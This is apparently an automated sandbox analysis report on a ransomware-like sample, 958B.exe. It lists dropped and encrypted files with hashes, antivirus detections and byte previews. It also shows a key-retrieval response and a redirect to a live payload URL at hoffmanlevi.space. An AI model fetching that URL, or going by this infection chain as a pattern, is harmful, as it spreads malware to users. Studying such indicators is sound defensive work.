MD5:	0D0C08D5341BB224A6453D3B4E110ADF
SHA1:	E1E8253A0CE8118CC18662E457B8D40FF9C9AE9E
SHA-256:	4F44CBF9A69F166B2D7C0222C2F639456A5895EA536A4E99D5775EA7129ADEBA
SHA-512:	03E9F56F8CC4F816FC7DD30B9EF1AC435EC3A77F93912DD622F240D430D8F9620934B77B311BCDE6ED86F0F4FF7F1DB9F60BB7FB7F0821DAC213C780853E85BB
Malicious:	false
Preview:	2023/......?~%j..v....0.2:...>y[LH.....<..<o...Q.....O...^,Z.0.i.....%.8.u..+cL.....r...S.69...d-..X..!h..........>R...O..x....x...........C..Z4..m.=.k.H>a#0F............\u\..E#(.de2..+Q...L...........k........ ....r.i........:..`...].\|...jt.0.\..d.N...R..gN...C.w[.)......y.Cm....e,B..].h...........).......i..j...\.Z\...nG,.q.dX..8..@..3......x..'...s.;....hX.......pV_.^zs%...CCA.>.[d..\G.....1wt.~v.7.......e.....ZSk...m...%.A.[Y..CmO...r.L'm..~]?.V....:..t.Q....j...;....bv..Wx.<..~%r?U..u5dn_.'.dM_.uc._3..!.V'..To..k..h..w D.Cy...1...H...(e......\Nz'jH5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	818
Entropy (8bit):	7.709640509170353
Encrypted:	false
SSDEEP:	24:YKWef6M8RIUR6Nv27VBwEX3bha3mEx/NEG3bGabD:Yg4fsNvcVV3bhqmSNbrD
MD5:	F075BA4278DB04FA2F8FD585A3D9C361
SHA1:	EC8ABBA9ACAEC6BFF32D3789DCE83DBB3F47E29A
SHA-256:	E45BA54ABAEF10C3C0ED679B61EAD38DED17A1F224A1CB178A8CE7CA9128ADF8
SHA-512:	CB4A22EF5E2DABFF34FD681267341113BFB95766CCF65CB7960D015B53B9A3DC0418FB9D86ACF85859EA72D4615F090116B100DD3277403020F50457D24BCFFF
Malicious:	false
Preview:	{"os_...-.....e..4..f/.;.8.y....7HbV.O.N).s.v.`,.....e..$...K.W.b4.]...4.y".U..1K.y.S..[>p{0^..Dd.'u6.. K.U.K.F...em.r.....j..j~!yH.r-.6P-O...r.....C.eR...h..y.H....#.V.bxL..]."........0.@....F.,...j.k.mF..=.M.zS.....U8..........D.....2..-..B....$.././.a..n..J..<.n..).........{...<@..#..#e!f.9<_...,..}.Ha1.MD.+8G@q..S........!..<.......0..C..@.]...~.O[.IV.@....].k..$....G.q...+p.....d...+6.....Q.B5.....)S}Y.OH.....U... 5..b...{..d.ao.s..18.....lt.&..e~D.o.<UM...Y.....>..*.....?......Y.v.2.z ...zug..y..r......'.m..qK..7.4...`.Gg...`.Q..s%..a...W..zg.V.%..(8...4W.6..4._+B(..Q../..H_.j......w............;...JJ#:.E%d`....,.I..5k.>.j...Q...W..../.x...[.~.....Mh.Y&.(....D..jN.-...X...z.Mdy\|..jA..&..H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	3947
Entropy (8bit):	7.943994487027005
Encrypted:	false
SSDEEP:	96:BXTqZCzGCKODgQ+ij0anspGGPkH8nRsbGd3ZkTq84CH:ZTpGCKRZGMdTnRsCdpkiU
MD5:	85745F33600A8845181CBA728192A6D5
SHA1:	3A12DBBD1FE25ADF4DAC279E4E79D69B09434152
SHA-256:	AF9D65FBC5CE32F2B112E431F97B25BC2E40233ABD231744F8F231C11195FFB1
SHA-512:	CF0AD23B54A285765A59A0E6A4803A9C9E77DECA03D89D90BF1F75CA1DF39FFCAE627F5A8DE793A70C0ED8DF1E9891EBD31F4C0DAECAFFD9215D17805C2732BB
Malicious:	false
Preview:	...#...HYVCE.\|~..:.!....../a>..q..I.j."I^.3...t?.H.t...8c...c8G.a.g..;7u.....e...s...'. j.c._...y.[:....#....2..i=..n..IH..."0a..+j..Z.i.tzcH.r....n"i.........l.u..@lP....?X....:.....sy.}..k..8.6!..g...J..~..k....'..m.L....b..>.C....2.......o.r.$..~..Z{F...S...7........gUn..e..klr`/.G}\|..".k....7..7._...sL\.br....w`......-.m^....J .H`.)..\|-......rN....Q....zB.....l.@`Q..]\...6..)OA@.Mi.l.....'\.eh.y.e.G./..i......0.e2<..I..t...b....a.2.[.......n(...Q@..q\.o.=.8,(..._T._....L.2Q!-...?.x.Z..c......N=:....;?p....l...o....s.....6..d.V.).;..%I...."-...0^.R..R.z..#.$."'."..a..]....H...M../^....,.?L..$.....O.9..O....J2m......._..T/...9..[....@I...=.......e./........../c.<uB...q%.[.$O#4]...P.Cf..k ..WqbH...........A.@uw.Y...0..tSJ..n.}......o....O.....M..{\|><.}.........jT......y..2;'.J:....{G...."W...s.u.w.W.....9X.o...13v./.D.%..~......M........?.*....<.......'T....\..\|...k.?...1...:./7..nT...OZ{..8{.....S..CV$z..IO.v....O...`.%"^5'.@.fO.y.W.

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	657
Entropy (8bit):	7.640299712035749
Encrypted:	false
SSDEEP:	12:k92C/BCJxi8gG3D7i9RLlZ7oHhZF2Ts1RV5G0/OVRRHTbryQ3cii9a:QUJGLzUvPRrgzbGabD
MD5:	AAEA7FB4DF96D0A3AD4A8483BCD36CB0
SHA1:	E7911C0F089EAC7073DA1B6A3B56E8F03B653B6C
SHA-256:	395DCD393187A31203EBA79D8DA5A9089C5F7BEB58862A2D4F4526BA9435C8AF
SHA-512:	DE0DC08C4E9A15EFAC7A3C10FF502DC623A1AD70873E627C9CA31B6870002E644A8F2553F302AA5CD3F9E3A48C1A92275767DD1976FDE165AEB7E67C3B674A21
Malicious:	false
Preview:	2023/F..j..^......B..m....t.cU.A....!l..1tu.`......7.c7.D.....tU...e......E/M./.h.....{M.K.......TB.8...h.Kj+.L.tGr,.N3..).....&....[(.j..m..Fk....$....;h.d...>.g...6.Vq..p.+v...b7.n7.^..&.....v.c..o...S.p...[!......8I.N.....9.G ..d........Y./.c?5..T......HZ.2..;_EW..'.........p]zF.x..L)t.......8...7E...~0...T.).....I...X.-..[~eVY......g~....V..<...J.B.-......AI.@..P........r....;.#%.....!.*.0.0..#....l8#...^7..K...g......p7i.n.../..S.!...;.R+V#.v.r.X.)n..8.......RT.9.em.......=...c.......S.a.I.+cX~........k...$G.Wn8<m........K....m}.f......+...%..F..H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	388
Entropy (8bit):	7.314642202189347
Encrypted:	false
SSDEEP:	12:xaAaw4pCEN0R+9/T/kzwwLjTDzWo0nHiTbryQ3cii9a:x9UCECpzlbzWxUbGabD
MD5:	E5C4D72C43C01C86600188FF8CBADC53
SHA1:	B35E99CD6A7CBBACD4DDBFD694A315ECF2CFA0B3
SHA-256:	9A6EEA54FEBEA2B1252F95E137186C63F3767FDB2B92E53F0A9078B43C87C5BE
SHA-512:	E4431D3FCBE6EB75E431CE90F7A3968025EAFC7352E0A182C34CD4C5A4C3D65C3F91D01895CAB5AE3FBE607391BC6ADA7585BE7690D1FDD440D59913AF2C0E69
Malicious:	false
Preview:	08../..".f...o..y.0....f.8...8..&1...[....J+}..P@..%.#.8.D.U.?..8R..4....D.5.ga.W...u.(...h............K....#.>T.].M....,......R.W......$u..E..l6%.l3..%BS....FT...P..^(].e.........l...$......l....}j..o.....;:.. I28.....X....DV.L1...D&..2...(}..............Z...4X.D.....F..B.!}.]nV:....y...%TH5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	460
Entropy (8bit):	7.402534244909402
Encrypted:	false
SSDEEP:	12:GvXskZZMSqjQqjdji0x8PrAzz2DXiTbryQ3cii9a:GvjZ2ScRqPczg0bGabD
MD5:	C2060A42585A5AE8E0D37DC38F40FFC7
SHA1:	CD883E8C117C8F33EB31A81F4A6089BEE20F102D
SHA-256:	581787CDFD1947EAB92CA5253723B8CD102C5084BB4C19E0062122921AD36ACB
SHA-512:	094735B6E60AE8D9864046E896612129B29038BD12679FEA621CB24B72C99D792820E2769E50FD2609E886F354811F52C88DE11EF755922C3478AFF8E636D0F4
Malicious:	false
Preview:	.h.6....._JP...}..=...........y.8....rK<......!C.{te.7.X....(.rL..]...c...,.0.E.s.........C./hX!D.S.l%.Z_L....\|B.l...}W.@.!.\|..K...}Ht.,..KS@.K.....K..U...1..6.<4....VF.6....3y.....,.'.....%.G.D..W....dhbS...W.r....Wt.R...6hF.h.`...r.J.0....{.....I.!.....2Iy).1.7U.....!....t..B.?...l#.f.r..;...jE...7..%P..........y.S'y}..q3......MR.g..\|P..cp-]V..e!....;Mo.H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	413696
Entropy (8bit):	6.2127990710955165
Encrypted:	false
SSDEEP:	6144:GTHw+DrMj8pM2PZSFeyqNW0/jFBewr7EPSmyNyNK94:CwsMj8pMAaeyqoEjF1FmGN
MD5:	22F2FD94F57B71F36A31EA18BE7D4B34
SHA1:	A8DC0A1AF7978FEA291F5306F1937A90AC9B6B5B
SHA-256:	BF1D4645972F8A10EF66D4343D0B3DC5B66EA2050A061E8194E6858A88220454
SHA-512:	5B1811DBDED599CF9580EFE2093594B31204404EC3F69F8C061FAC1F2EEE261F9837ADF63A4C55A206D39F9071ADE5B663615BA05D9A023C69A7F2B0F6BCF173
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v...%...%...%..P%...%..d%..%..e%...%..]%...%...%5..%..a%...%..T%...%..S%...%Rich...%........PE..L.....7d.................&...Z.......L.......@....@..........................0......N........................................'..d....P...............................................................7..@...............8............................text...(%.......&.................. ..`.data........@...<...*..............@....tixecil.....0.......f..............@....rake........@.......j..............@....rsrc........P.......p..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	306688
Entropy (8bit):	6.7250330334577075
Encrypted:	false
SSDEEP:	6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
MD5:	41B883A061C95E9B9CB17D4CA50DE770
SHA1:	1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
SHA-256:	FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
SHA-512:	CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......\|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	5.252542495586483
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
MD5:	2F99BED9FF8C41AFEE96B028ED8B86A2
SHA1:	BF4E91361EE28C5506E812F2BF8C3495676097B0
SHA-256:	F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
SHA-512:	834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000014.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	111904
Entropy (8bit):	4.018987275227091
Encrypted:	false
SSDEEP:	768:bloNkXGKOyCXJjk038Yo1/pZNkLYAwAjpNaZP8utR1vcq+a3UmwypT3O2hLikGkI:kk8yTYo1/pWwdhLikGknSz9FSKawp
MD5:	1DFF747B5F750BC842F958EF2D0D62CA
SHA1:	627EFCA3253F7278B949CFB4DDEE00BCC407FBB6
SHA-256:	92B678BB47E4F068C249A021CB99E7479C46F5719E8AF3EF5CEC919188203F19
SHA-512:	6184AFF563DF7C22E778210C25BD5DA3AB740C33F3F425A9600224F16E449C8311DD1D13D29BFA2B7AA94150A5ED2EF899BC38203E2C72D34188D6C3439FC229
Malicious:	false
Preview:	....h... ... ...........P...............^.......c...h...................\.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	111072
Entropy (8bit):	4.024848475871876
Encrypted:	false
SSDEEP:	768:ylsEkAG7maa9Zjk0bnB7UczUNmL2Jrj9/j9PaNUR1vMR+RjxYJmZypP3oghBiIGA:qkVma+B7UczmwhBiIG/nYzFDKWydCMAR
MD5:	85D7220A93A53240131E82E6BB1921DC
SHA1:	51C7D39345F41ED9125D36163D08F87DC9261016
SHA-256:	384B3AC81ED7DA8C142038ED312FD3A8B236A8B28ACE8952AC280E19808841E8
SHA-512:	3F243B43582C83C8F9FB1436F843573A85FF2A92E848D7B34864861D57241C6D2DE8B90696DC4BAF3E3A402C8E0DBB375622B8EE9126E58859DE05C85DE9C90B
Malicious:	false
Preview:	....h... ......H.......P...........H...^.......c...(...............P...\.......e.n.-.C.H.;.e.n.-.G.B...............H..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	109192
Entropy (8bit):	4.037153595293232
Encrypted:	false
SSDEEP:	768:mlHCk9Grld5wWjk0H7jOkqUb1NTLB6tjIHSHhwXP5qVR1v/U9tJfmRyp43ZcKGTL:bkOldBOkqUb9prlhqiKGmnfS5FNKT1q
MD5:	E1F710E132D30F6F3024AACADC0B6514
SHA1:	98BCE951CF3CA448B69120EBAAD6AF1173765C01
SHA-256:	3F48D2C3941B952454FF10D294EE5FBA0D26C27D5097FFE7358B3314ECF1C8FB
SHA-512:	E85FB1681AADFBC5456AF2BF85C4BA75A0C49E50D969F4640F39E5AFD336D3D87D668F2D47378D23BC8F1840C82FF272293B419D40FF00BB6E9C8A1EC36E7001
Malicious:	false
Preview:	....h... ...............P...............^...p...c..........p...........\.......e.n.-.C.H.;.e.n.-.G.B.............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	413696
Entropy (8bit):	6.2127990710955165
Encrypted:	false
SSDEEP:	6144:GTHw+DrMj8pM2PZSFeyqNW0/jFBewr7EPSmyNyNK94:CwsMj8pMAaeyqoEjF1FmGN
MD5:	22F2FD94F57B71F36A31EA18BE7D4B34
SHA1:	A8DC0A1AF7978FEA291F5306F1937A90AC9B6B5B
SHA-256:	BF1D4645972F8A10EF66D4343D0B3DC5B66EA2050A061E8194E6858A88220454
SHA-512:	5B1811DBDED599CF9580EFE2093594B31204404EC3F69F8C061FAC1F2EEE261F9837ADF63A4C55A206D39F9071ADE5B663615BA05D9A023C69A7F2B0F6BCF173
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v...%...%...%..P%...%..d%..%..e%...%..]%...%...%5..%..a%...%..T%...%..S%...%Rich...%........PE..L.....7d.................&...Z.......L.......@....@..........................0......N........................................'..d....P...............................................................7..@...............8............................text...(%.......&.................. ..`.data........@...<...*..............@....tixecil.....0.......f..............@....rake........@.......j..............@....rsrc........P.......p..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build3[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	306688
Entropy (8bit):	6.7250330334577075
Encrypted:	false
SSDEEP:	6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
MD5:	41B883A061C95E9B9CB17D4CA50DE770
SHA1:	1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
SHA-256:	FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
SHA-512:	CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......\|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\get[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	559
Entropy (8bit):	6.0367176464319545
Encrypted:	false
SSDEEP:	12:YGJ68VCymOkZQv6L9QJQhZwJ16n5EhAR3GdG5FTbryQ4:YgJ0bOoQiCzJ165jR3GdGnbGr
MD5:	122FF82890BA004F43B2DEC1D2BB3855
SHA1:	33B85D2794353271843172DD4A99DCF7B508DB28
SHA-256:	4A7B9367316B63CB87F9691279C20E0147A1D9465F902E32806F2AD10014EC90
SHA-512:	F3BE71A3303FFD531B895FAF3AA652403B4D201307B21FBE4EAB2292C89CB89AABC12FBA2AFF54459D5E578972624923A38850C8D5964CA5440D1B8EC3875654
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqjGuLm953WsyCRcw+iWJ\\nL3KRGfABVHa0iHYuV9shhKDYL4muxVv2HfoarGcwr\/MOPHVtPeEvtkxfDI2YEd0S\\nfbtpb\/9Pa\/meDCCetZFo\/NIledFZVdVM4zuYLhWEKxJ4Mq8nRFw7I6Qci862eYTk\\nSXwn04ouNh\/OsYNT5AALw4r7KMyZkSNGMO9azoKKwuDtCQnDPOZvwL1UuLh73WKf\\nLpOkVy+w422xw+LDPrRNmsfgb+qBlbg+EDlgPVqsXfPlgY4jUf8VdXlDr3OE7LC4\\nEeQ28ctcibQkSvDNaLpTzVGnQ+QPBPuY+xpHoQFQRL8zWWH3magM8zL7MyRDJUKa\\n0QIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\setup[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7499856
Entropy (8bit):	7.99664853521542
Encrypted:	true
SSDEEP:	196608:91ORgbs83+lNBfe2tS9jGhoHurfXfvhgBPJ/1Cw5rD:3ORZ83uh4GhoODv5gb1CwRD
MD5:	CAC360E5FB18E8F135B7008CB478E15A
SHA1:	37E4F9B25237B12AB283FC70BF89242AB3B83875
SHA-256:	E8689F69DD3D0A3BD5F6E4B3A85251583C4B3B1DBF03E0C30C6CF0048E6532F8
SHA-512:	7F0BD6103DD802DE4A4665B460C8C178F32E6075094532EC43C83FC1D8595D9495772BF191669F4B72CC2D78F91B06E046A11BBD0EF935B040EEB31E741D2A32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\setup[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.236094826754542
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPNf6hN7xQh4SiKRzp9zQEcXaoD:J0+ox0RJWWPl+Whzl/QEma+
MD5:	78B9F2997CB21CAEC568AA6A3849D9C2
SHA1:	5C3D17C0DC35FC253E7A902335C421BCF97CDF10
SHA-256:	803A590DC636674D54CF671238C33C990F08D1CA919A3723C543F1429B6C25AF
SHA-512:	4423142ACF3DEA5EA1F495E5C73B46B67D439B2A88A9F576A37C8AB431ED56A72291275B1D044396F5D583709490338B4BB6C091AEECDEB605474E0FE5C8EB08
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://hoffmanlevi.space/385119/setup.exe">here</a>.</p>.<hr>.<address>Apache/2.4.55 (Unix) Server at mikolyda.beget.tech Port 80</address>.</body></html>.

C:\Users\user\AppData\Local\Temp\1000112001\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7499856
Entropy (8bit):	7.99664853521542
Encrypted:	true
SSDEEP:	196608:91ORgbs83+lNBfe2tS9jGhoHurfXfvhgBPJ/1Cw5rD:3ORZ83uh4GhoODv5gb1CwRD
MD5:	CAC360E5FB18E8F135B7008CB478E15A
SHA1:	37E4F9B25237B12AB283FC70BF89242AB3B83875
SHA-256:	E8689F69DD3D0A3BD5F6E4B3A85251583C4B3B1DBF03E0C30C6CF0048E6532F8
